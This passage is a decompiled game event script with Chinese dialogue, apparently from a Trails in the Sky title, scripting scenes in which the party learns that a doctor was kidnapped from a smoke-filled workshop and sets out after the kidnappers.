OP_8E(0xFE, 0xFFFF961A, 0x1F40, 0xEC04, 0xFA0, 0x0) ExitThread() QueueWorkItem(0x1B, 2, lambda_4F3C) Sleep(2000) def lambda_4F5C(): OP_6D(-26430, 8000, 57990, 4000) ExitThread() QueueWorkItem(0x101, 1, lambda_4F5C) def lambda_4F74(): OP_67(0, 11000, -10000, 4000) ExitThread() QueueWorkItem(0x101, 2, lambda_4F74) def lambda_4F8C(): OP_6B(3000, 4000) ExitThread() QueueWorkItem(0x102, 1, lambda_4F8C) def lambda_4F9C(): label("loc_4F9C") TurnDirection(0xFE, 0xA, 0) OP_48() Jump("loc_4F9C") QueueWorkItem2(0x9, 1, lambda_4F9C) Sleep(300) ClearChrFlags(0xA, 0x80) OP_62(0xA, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3) OP_8E(0xA, 0xFFFF96E2, 0x1F40, 0xE54C, 0xFA0, 0x0) Sleep(1000) OP_44(0x9, 0xFF) OP_44(0xB, 0xFF) ChrTalk( 0xA, ( "呼呼……\x01", "还、还以为死定了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, "#800F没事比什么都好。\x02", ) CloseMessageWindow() TurnDirection(0x9, 0xB, 400) ChrTalk( 0x9, "#804F好，所有人都没事吧？\x02", ) CloseMessageWindow() TurnDirection(0xB, 0x9, 400) ChrTalk( 0xB, "是、是的，普通员工都……\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#2P工房长先生！\x02", ) CloseMessageWindow() def lambda_50CF(): OP_6D(-25700, 8000, 55810, 2000) ExitThread() QueueWorkItem(0x101, 2, lambda_50CF) def lambda_50E7(): label("loc_50E7") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_50E7") QueueWorkItem2(0x9, 1, lambda_50E7) def lambda_50F8(): label("loc_50F8") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_50F8") QueueWorkItem2(0xB, 1, lambda_50F8) def lambda_5109(): label("loc_5109") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_5109") QueueWorkItem2(0xA, 1, lambda_5109) def lambda_511A(): OP_8E(0xFE, 0xFFFFA010, 0x1F40, 0xDD9A, 0x1388, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_511A) Sleep(300) def lambda_513A(): OP_8E(0xFE, 0xFFFF9F16, 0x1F40, 0xDA0C, 0x1388, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_513A) Sleep(300) def lambda_515A(): OP_8E(0xFE, 0xFFFFA2D6, 0x1F40, 0xE146, 0x1388, 0x0) ExitThread() QueueWorkItem(0x107, 1, lambda_515A) Sleep(300) def lambda_517A(): OP_8E(0xFE, 0xFFFFA52E, 0x1F40, 0xDBA6, 0x1388, 0x0) ExitThread() QueueWorkItem(0x8, 1, lambda_517A) WaitChrThread(0x102, 0x1) TurnDirection(0x102, 0x9, 0) ChrTalk( 0x9, ( "#802F#2P哦哦，是你们……\x01", "已经从亚尔摩回来了啊！\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#002F这骚动究竟是怎么回事！？\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#804F#2P看来是建筑物内部哪里的\x01", "瓦斯泄漏了出来！\x02\x03", "从地下到五楼都是烟。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#012F难道是火灾吗？\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#803F#2P灭火装置没有运作，\x01", "所以应该不用担心是火灾。\x02\x03", "但是，为什么会漏烟，\x01", "这一点我实在是想不通……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#063F那、那个，工房长叔叔。\x01", "爷爷他在哪呢？\x02", ) ) CloseMessageWindow() OP_44(0xA, 0xFF) OP_44(0x9, 0xFF) OP_44(0xB, 0xFF) ChrTalk( 0x9, "#802F#2P咦，他不是在……\x02", ) CloseMessageWindow() TurnDirection(0x9, 0xB, 400) ChrTalk( 0x9, ( "#802F#2P海泽尔。\x01", "你不是已经确认过了吗？\x02", ) ) CloseMessageWindow() TurnDirection(0xB, 0x9, 400) ChrTalk( 0xB, "那、那个……\x02", ) CloseMessageWindow() TurnDirection(0x107, 0xB, 0) ChrTalk( 0xB, ( "普通员工都已经确认过了，\x01", "不过唯独拉赛尔博士还没……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#065F！！！\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#804F#2P你说什么！\x01", "他还留在里面吗！？\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#005F工房长先生！\x01", "博士的事就交给我们吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#012F我们进去看看情况。\x02", ) CloseMessageWindow() TurnDirection(0x9, 0x101, 0) ChrTalk( 0x9, ( "#805F#2P不、不好意思。\x01", "又要拜托你们俩了。\x02", ) ) CloseMessageWindow() TurnDirection(0x107, 0x101, 400) ChrTalk( 0x107, "#065F我、我也去……！\x02", ) CloseMessageWindow() def lambda_5519(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x101, 1, lambda_5519) def lambda_5527(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_5527) def lambda_5535(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x9, 1, lambda_5535) def lambda_5543(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x8, 1, lambda_5543) def lambda_5551(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0xB, 1, lambda_5551) Sleep(400) ChrTalk( 0x101, "#004F#2P咦……\x02", ) CloseMessageWindow() ChrTalk( 0x9, "#802F#2P提妲？\x02", ) CloseMessageWindow() ChrTalk( 0x107, ( "#062F我对中央工房里面的环境\x01", "比较熟悉……\x02\x03", "所以所以……\x01", "我可以为艾丝蒂尔姐姐你们带路。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#003F#2P提妲……\x02\x03", "#002F明白了，一起来吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#012F#5P不过，一旦有危险的话，\x01", "你一定要马上离开，知道吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#063F嗯、嗯……\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#155F那、那个～\x01", "我也要跟你们一起……\x02", ) ) CloseMessageWindow() def lambda_56B3(): TurnDirection(0xFE, 0x8, 400) ExitThread() QueueWorkItem(0x101, 1, lambda_56B3) def lambda_56C1(): TurnDirection(0xFE, 0x8, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_56C1) def lambda_56CF(): TurnDirection(0xFE, 0x8, 400) ExitThread() QueueWorkItem(0x107, 1, lambda_56CF) Sleep(400) ChrTalk( 0x101, "#002F#2P不行。\x02", ) CloseMessageWindow() ChrTalk( 0x102, ( "#015F#5P对不起。\x01", "你还是留在这里吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#154F唔～好果断的回答啊……\x02\x03", "不过没办法了。\x01", "你们三个要小心哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#800F#2P假如博士在里面的话，\x01", "你们上三楼的工作室就应该能找到他。\x02\x03", "先去那里确认一下吧。\x02", ) ) CloseMessageWindow() def lambda_5805(): TurnDirection(0xFE, 0x9, 400) ExitThread() QueueWorkItem(0x101, 1, lambda_5805) def lambda_5813(): TurnDirection(0xFE, 0x9, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_5813) def lambda_5821(): TurnDirection(0xFE, 0x9, 400) ExitThread() QueueWorkItem(0x107, 1, lambda_5821) Sleep(400) ChrTalk( 0x101, "#006F嗯，明白！\x02", ) CloseMessageWindow() ChrTalk( 0x102, "#012F那么我们去了。\x02", ) CloseMessageWindow() OP_44(0x21, 0x1) OP_44(0x11, 0x1) OP_44(0x1F, 0x1) OP_44(0x1C, 0x1) OP_44(0x1B, 0x1) OP_44(0x17, 0x1) OP_44(0xB, 0x1) OP_44(0xA, 0x1) OP_44(0x24, 0x1) OP_4B(0x21, 0) OP_4B(0x11, 0) OP_4B(0x1F, 0) OP_4B(0x1C, 0) OP_4B(0x1B, 0) OP_4B(0x17, 0) OP_4B(0xB, 0) OP_4B(0xA, 0) OP_4B(0x24, 0) ClearChrFlags(0x1C, 0x40) ClearChrFlags(0x1B, 0x40) ClearChrFlags(0x17, 0x40) ClearChrFlags(0xB, 0x40) ClearChrFlags(0x11, 0x40) ClearChrFlags(0x22, 0x40) ClearChrFlags(0x23, 0x40) ClearChrFlags(0x11, 0x4) ClearChrFlags(0x22, 0x4) ClearChrFlags(0x23, 0x4) OP_4B(0xA, 255) OP_4B(0x9, 255) OP_4B(0xB, 255) OP_4B(0x8, 255) OP_43(0x9, 0x0, 0x0, 0x3) OP_43(0xA, 0x0, 0x0, 0x3) OP_43(0xB, 0x0, 0x0, 0x3) OP_8C(0x8, 270, 0) SetMapFlags(0x2000000) SetMapFlags(0x800) OP_A2(0x52C) EventEnd(0x0) Return() # Function_47_4AD9 end def Function_48_5917(): pass label("Function_48_5917") EventBegin(0x0) OP_6D(-35220, 10000, 59310, 0) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_4A(0x1C, 0) OP_4A(0x1B, 0) OP_4A(0x17, 0) OP_4A(0xB, 0) OP_4A(0xA, 0) OP_4A(0x24, 0) SetChrPos(0x1C, -26070, 8000, 62840, 63) SetChrPos(0x1B, -25060, 8000, 63650, 180) SetChrPos(0x24, -24740, 8000, 62540, 3) SetChrPos(0xB, -37650, 10000, 59010, 0) SetChrPos(0xA, -28440, 8000, 62590, 129) SetChrPos(0x9, -26520, 8000, 57300, 0) SetChrPos(0x101, -34600, 10000, 59260, 90) SetChrPos(0x106, -35290, 10000, 58430, 90) SetChrPos(0x102, -35240, 10000, 60170, 90) SetChrPos(0x107, -35880, 10000, 59390, 90) ClearChrFlags(0x9, 0x80) ClearChrFlags(0x8, 0x80) SetChrPos(0x9, -26240, 8000, 58320, 270) SetChrPos(0x8, -27270, 8000, 58010, 270) OP_4A(0x9, 255) OP_4A(0x8, 255) def lambda_5A3E(): label("loc_5A3E") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_5A3E") QueueWorkItem2(0x8, 1, lambda_5A3E) def lambda_5A4F(): label("loc_5A4F") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_5A4F") QueueWorkItem2(0x9, 1, lambda_5A4F) def lambda_5A60(): OP_8E(0xFE, 0xFFFF9232, 0x1F40, 0xE6AA, 0x1388, 0x0) ExitThread() QueueWorkItem(0x106, 2, lambda_5A60) def lambda_5A7B(): OP_8E(0xFE, 0xFFFF9458, 0x1F40, 0xEA1A, 0x1388, 0x0) ExitThread() QueueWorkItem(0x101, 2, lambda_5A7B) def lambda_5A96(): OP_8E(0xFE, 0xFFFF9764, 0x1F40, 0xED3A, 0x1388, 0x0) ExitThread() QueueWorkItem(0x102, 2, lambda_5A96) def lambda_5AB1(): OP_8E(0xFE, 0xFFFF8F30, 0x1F40, 0xEC86, 0x1388, 0x0) ExitThread() QueueWorkItem(0x107, 2, lambda_5AB1) def lambda_5ACC(): OP_6D(-27780, 8000, 59800, 2000) ExitThread() QueueWorkItem(0x101, 3, lambda_5ACC) def lambda_5AE4(): OP_6B(2700, 2000) ExitThread() QueueWorkItem(0x102, 3, lambda_5AE4) FadeToBright(1000, 0) def lambda_5AFD(): label("loc_5AFD") TurnDirection(0xFE, 0x8, 400) OP_48() Jump("loc_5AFD") QueueWorkItem2(0x106, 1, lambda_5AFD) def lambda_5B0E(): label("loc_5B0E") TurnDirection(0xFE, 0x9, 400) OP_48() Jump("loc_5B0E") QueueWorkItem2(0x101, 1, lambda_5B0E) def lambda_5B1F(): label("loc_5B1F") TurnDirection(0xFE, 0x9, 400) OP_48() Jump("loc_5B1F") QueueWorkItem2(0x102, 1, lambda_5B1F) def lambda_5B30(): label("loc_5B30") TurnDirection(0xFE, 0x9, 400) OP_48() Jump("loc_5B30") QueueWorkItem2(0x107, 1, lambda_5B30) WaitChrThread(0x101, 0x3) ChrTalk( 0x8, "#151F啊，小艾你们出来了～！\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#801F哦哦，你们没事吧。\x02\x03", "刚才军队的人从里面走出来，\x01", "我还在想出什么事了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, "#055F#1P军队的人……！？\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#005F等、等一下！\x01", "不是穿黑衣服的家伙吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#802F你说什么呀？\x02\x03", "是身着蓝白色军装、\x01", "礼仪端正的王国军军人啊……\x02\x03", "听说他们是从\x01", "艾尔·雷登关所派来的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#151F从那军装来看，\x01", "他们的确是女王陛下的亲卫队呢～\x02\x03", "他们样子好帅哦～\x01", "我毫不犹豫地拍了照片呢～\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#004F亲卫队……的人！？\x02", ) CloseMessageWindow() ChrTalk( 0x102, ( "#012F就是在卢安\x01", "把市长逮捕的那些军人吧。\x02\x03", "但是，他们怎么会在这里……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#062F那、那个！\x02\x03", "工房长叔叔，\x01", "那些人没带着爷爷吗！？\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#805F带、带着拉赛尔博士！？\x02\x03", "没、没有……\x01", "可是他们带着很大包的货物……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#065F！！！\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#005F没错，就是他们！\x02", ) CloseMessageWindow() ChrTalk( 0x106, ( "#057F#1P那些杂碎……\x01", "在导力梯里换成军服吗……\x02\x03", "#056F哼，太瞧不起人了吧！\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#802F等、等一下！\x01", "这到底是怎么回事……\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#016F详细情况我们之后会向您汇报。\x02\x03", "请问工房长先生，\x01", "那些军人往哪个方向去了？\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#805F说、说是有急事，\x01", "往城镇市街区方向去了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, "#054F#1P快追！\x02", ) CloseMessageWindow() SetChrFlags(0x106, 0x40) def lambda_603E(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1770, 0x0) ExitThread() QueueWorkItem(0x106, 1, lambda_603E) Sleep(200) ChrTalk( 0x101, "#005F决不能让他们逃走！\x02", ) CloseMessageWindow() def lambda_608A(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1770, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_608A) Sleep(400) def lambda_60AA(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1770, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_60AA) Sleep(100) def lambda_60CA(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1388, 0x0) ExitThread() QueueWorkItem(0x107, 1, lambda_60CA) Sleep(2000) OP_20(0x5DC) FadeToDark(1500, 0, -1) OP_0D() OP_21() SoundDistance(0xA0, 0xFFFFEDF4, 0x14C8, 0xE790, 0x2710, 0x7530, 0x1, 0x0) Sleep(500) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "虽然艾丝蒂尔他们\x01", "分头在蔡斯市的市街区寻找犯人的踪迹……\x02", ) ) CloseMessageWindow() AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "但即使是挨家挨户地寻找，\x01", "仍然没能找到博士和绑架博士的黑衣人。\x02", ) ) CloseMessageWindow() AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "不久，位于湖畔上的雷斯顿要塞接到通报，\x01", "派出了王国军的部队前来中央工房……\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) ClearMapFlags(0x40000000) ClearMapFlags(0x2000000) OP_A2(0x536) OP_28(0x41, 0x1, 0x40) ClearMapFlags(0x800) OP_A2(0x3FA) NewScene("ED6_DT01/T3115 ._SN", 100, 0, 0) IdleLoop() Return() # Function_48_5917 end def Function_49_6273(): pass label("Function_49_6273") EventBegin(0x0) OP_6D(-36480, 10000, 59730, 0) OP_67(0, 7190, -10000, 0) OP_6B(3350, 0) OP_6C(315000, 0) OP_6E(262, 0) OP_44(0x11, 0xFF) SetChrPos(0x11, -23800, 10000, 46930, 180) OP_43(0x11, 0x0, 0x0, 0x3) RemoveParty(0xF, 0xFF) SetChrPos(0x101, -34420, 10000, 58850, 270) SetChrPos(0x107, -34550, 10000, 57970, 315) SetChrPos(0x106, -33590, 10000, 59410, 270) SetChrPos(0x102, -34780, 10000, 59820, 225) SetChrFlags(0x8, 0x40) ClearChrFlags(0x8, 0x80) SetChrPos(0x8, -36000, 10000, 58980, 90) OP_4A(0x8, 255) OP_6F(0x0, 60) FadeToBright(1000, 0) OP_0D() ChrTalk( 0x8, ( "#153F#1P啊，对了～\x01", "还得去买感光结晶回路才行呢。\x02\x03", "#150F那我先告辞啦～\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#501F啊，嗯。\x01", "朵洛希也辛苦了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#154F#1P没有啦。\x01", "我可是一点忙也没帮上呢～\x02\x03", "我也会去问问编辑部，\x01", "调查看看有没有什么情报。\x02", ) ) CloseMessageWindow() TurnDirection(0x8, 0x107, 400) ChrTalk( 0x8, ( "#150F#1P所以……\x01", "小提，打起精神来哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F啊……\x02\x03", "好的……\x01", "谢谢……朵洛希姐姐。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#150F#1P不用担心啦～\x01", "小艾和小约还有红头发大哥\x01", "一定会平安无事地救出你爷爷的。\x02\x03", "#151F那么，再见啦～\x02", ) ) CloseMessageWindow() OP_8C(0x8, 270, 400) def lambda_652F(): OP_6D(-35480, 10000, 59730, 1000) ExitThread() QueueWorkItem(0x8, 2, lambda_652F) OP_8E(0x8, 0xFFFF6D02, 0x2710, 0xE66E, 0xBB8, 0x0) OP_6F(0x0, 60) OP_70(0x0, 0x0) SetChrFlags(0x8, 0x80) WaitChrThread(0x8, 0x2) ChrTalk( 0x107, "#063F…………………………\x02", ) CloseMessageWindow() def lambda_6581(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x106, 1, lambda_6581) def lambda_658F(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_658F) TurnDirection(0x101, 0x107, 400) ChrTalk( 0x101, ( "#006F#5P提妲……\x02\x03", "#006F打起精神来吧，\x01", "博士他一定会没事的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F#2P是啊，他们应该不会\x01", "伤害王国第一的天才学者的。\x02", ) ) CloseMessageWindow() TurnDirection(0x107, 0x102, 400) ChrTalk( 0x107, ( "#063F艾丝蒂尔姐姐、约修亚哥哥……\x02\x03", "#067F嗯……是呢。\x01", "爷爷一定会没事的……\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, "#552F…………………………\x02", ) CloseMessageWindow() OP_62(0x101, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) OP_22(0x26, 0x0, 0x64) Sleep(1000) OP_8C(0x101, 90, 400) ChrTalk( 0x101, "#004F#5P怎么啦，又板着一张严肃脸？\x02", ) CloseMessageWindow() def lambda_6710(): TurnDirection(0xFE, 0x106, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_6710) def lambda_671E(): TurnDirection(0xFE, 0x106, 400) ExitThread() QueueWorkItem(0x107, 1, lambda_671E) ChrTalk( 0x106, ( "#053F……没什么。\x02\x03", "#050F时间紧迫，\x01", "我们快点去协会吧。\x02", ) ) CloseMessageWindow() OP_28(0x41, 0x1, 0x80) EventEnd(0x0) Return() # Function_49_6273 end def Function_50_6778(): pass label("Function_50_6778") EventBegin(0x0) OP_6D(-22950, 8000, 63790, 0) OP_67(0, 11000, -10000, 0) OP_6B(2800, 0) OP_6C(315000, 0) OP_6E(262, 0) SetChrPos(0x102, -22960, 8000, 73260, 0) SetChrPos(0x101, -21990, 8000, 74030, 0) SetChrPos(0x107, -23770, 8000, 73860, 0) def lambda_67F0(): OP_8E(0xFE, 0xFFFFA646, 0x1F40, 0xF5F0, 0xBB8, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_67F0) Sleep(300) def lambda_6810(): OP_8E(0xFE, 0xFFFFA934, 0x1F40, 0xF9BA, 0xBB8, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_6810) Sleep(300) def lambda_6830(): OP_8E(0xFE, 0xFFFFA4C0, 0x1F40, 0xFABE, 0xBB8, 0x0) ExitThread() QueueWorkItem(0x107, 1, lambda_6830) FadeToBright(1000, 0) WaitChrThread(0x102, 0x1) OP_8C(0x102, 0, 400) WaitChrThread(0x101, 0x1) OP_8C(0x101, 270, 400) WaitChrThread(0x107, 0x1) OP_8C(0x107, 135, 400) ChrTalk( 0x102, ( "#010F接下来，\x01", "我们先去游击士协会一趟吧。\x02\x03", "说不定雾香小姐已经问到\x01", "有关黑衣人那艘飞艇的情报。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#006F嗯，如果能从王国军那里\x01", "得到什么情报就好了……\x02\x03", "#004F啊，提妲也一起来吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F那、那个……\x02\x03", "不好意思呢。\x01", "我想去照看阿加特大哥哥。\x02\x03", "他还没醒过来，\x01", "我有点放心不下呢……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#501F提妲……\x02\x03", "#001F明白了。\x01", "博士的事就交给我们吧！\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#063F对不起……\x01", "我老是给姐姐你们添麻烦……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#506F你这孩子真是的～\x01", "又在跟我们客气起来了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F虽然阿加特兄现在还没醒来，\x01", "不过只要有朋友陪在旁边，\x01", "自己休息的时候也会安心许多吧。\x02\x03", "阿加特兄就拜托你了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#560F嗯、嗯……！\x02", ) CloseMessageWindow() def lambda_6B54(): label("loc_6B54") TurnDirection(0xFE, 0x107, 0) OP_48() Jump("loc_6B54") QueueWorkItem2(0x101, 1, lambda_6B54) def lambda_6B65(): label("loc_6B65") TurnDirection(0xFE, 0x107, 0) OP_48() Jump("loc_6B65") QueueWorkItem2(0x102, 1, lambda_6B65) OP_8C(0x107, 225, 400) def lambda_6B7D(): OP_6C(270000, 2000) ExitThread() QueueWorkItem(0x107, 1, lambda_6B7D) def lambda_6B8D(): OP_6D(-22510, 8000, 63590, 2000) ExitThread() QueueWorkItem(0x107, 2, lambda_6B8D) OP_8E(0x107, 0xFFFF9124, 0x1F40, 0xEDBC, 0x1388, 0x0) OP_8E(0x107, 0xFFFF770C, 0x2710, 0xE95C, 0x1388, 0x0) SetChrFlags(0x107, 0x80) ChrTalk( 0x101, ( "#006F啊啊～\x01", "提妲这孩子真是又坚强又可爱。\x02\x03", "对那个爱闹别扭的刀子嘴\x01", "根本用不着那么温柔嘛。\x02", ) ) CloseMessageWindow() OP_44(0x101, 0xFF) OP_44(0x102, 0xFF) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F好了好了，别吃醋了。\x02\x03", "说起来，\x01", "你和阿加特兄性格倒挺相似的。\x02", ) ) CloseMessageWindow() OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1) OP_22(0x27, 0x0, 0x64) Sleep(1000) TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#004F啊！？\x02\x03", "#009F真、真讨厌～\x01", "我和那家伙哪里相似了？\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#019F行事比较冲动啦，\x01", "又爱做老好人啦。\x02\x03", "#010F阿加特兄虽然说话刻薄了点，\x01", "但却很会为对方着想。\x02\x03", "这一点，\x01", "我想提妲也应该很清楚吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#509F唔唔……\x01", "虽然有点难以理解……\x02\x03", "#007F不说这个了，\x01", "总之先去协会问问看吧。\x02\x03", "希望在那刀子嘴伤势康复之前，\x01", "能够查到什么线索，然后做点成绩给他看。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#019F哈哈，是啊。\x02", ) CloseMessageWindow() SetChrPos(0x107, -22820, 8000, 62610, 0) EventEnd(0x0) RemoveParty(0x6, 0xFF) Return() # Function_50_6778 end def Function_51_6ECF(): pass label("Function_51_6ECF") ClearMapFlags(0x2000000) EventBegin(0x0) OP_6D(-23500, 8000, 69230, 0) OP_67(0, 8490, -10000, 0) OP_6B(3000, 0) OP_6C(306000, 0) OP_6E(262, 0) SetChrPos(0x101, -24660, 8000, 82550, 0) SetChrPos(0x102, -22920, 8000, 83030, 0) def lambda_6F3B(): OP_8E(0xFE, 0xFFFFA146, 0x1F40, 0x10E28, 0x1388, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_6F3B) Sleep(500) def lambda_6F5B(): OP_8E(0xFE, 0xFFFFA7CC, 0x1F40, 0x111DE, 0x1388, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_6F5B) WaitChrThread(0x101, 0x1) OP_8C(0x101, 0, 400) ChrTalk( 0x101, "#007F哈啊～吓了我一跳呢。\x02", ) WaitChrThread(0x101, 0x1) TurnDirection(0x102, 0x101, 400) CloseMessageWindow() ChrTalk( 0x102, ( "#012F再磨磨蹭蹭的话，\x01", "情报部那些人就要过来了……\x02\x03", "我们直接出城吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#002F嗯，知道了。\x02\x03", "唔……去王都的话，\x01", "应该从东边的街道走吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#012F没错，沿着利塔街道往北走，\x01", "到达『圣海姆门』就可以了。\x02\x03", "穿过大门，\x01", "就进入王都格兰赛尔地区了。\x02", ) ) CloseMessageWindow() OP_28(0x54, 0x1, 0x10) OP_20(0x5DC) Sleep(500) EventEnd(0x0) OP_1D(0xD) Return() # Function_51_6ECF end def Function_52_7169(): pass label("Function_52_7169") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 4)), scpexpr(EXPR_END)), "loc_7264") EventBegin(0x1) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_71E4") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#012F我们最好不要靠近飞艇坪了。\x01", "　\x02\x03", "还是赶快出城去吧。\x01", "　\x02", ) ) CloseMessageWindow() Jump("loc_7246") label("loc_71E4") ChrTalk( 0x101, ( "#002F……情报部的人要从飞艇坪过来了。\x01", "　\x02\x03", "还是不要靠近为好。\x02", ) ) CloseMessageWindow() label("loc_7246") OP_90(0x0, 0x0, 0x0, 0xFFFFFA24, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) Jump("loc_7382") label("loc_7264") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x342)"), scpexpr(EXPR_EXEC_OP, "OP_40(0x341)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x340)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x343)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x344)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x345)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x35E)"), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_7295") Call(0, 53) Jump("loc_7382") label("loc_7295") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_7382") EventBegin(0x1) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7309") ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() Jump("loc_7367") label("loc_7309") TurnDirection(0x102, 0x0, 400) ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() label("loc_7367") OP_90(0x0, 0x0, 0x0, 0xFFFFFA24, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) label("loc_7382") Return() # Function_52_7169 end def Function_53_7383(): pass label("Function_53_7383") EventBegin(0x1) Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x342)"), scpexpr(EXPR_EXEC_OP, "OP_40(0x341)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, 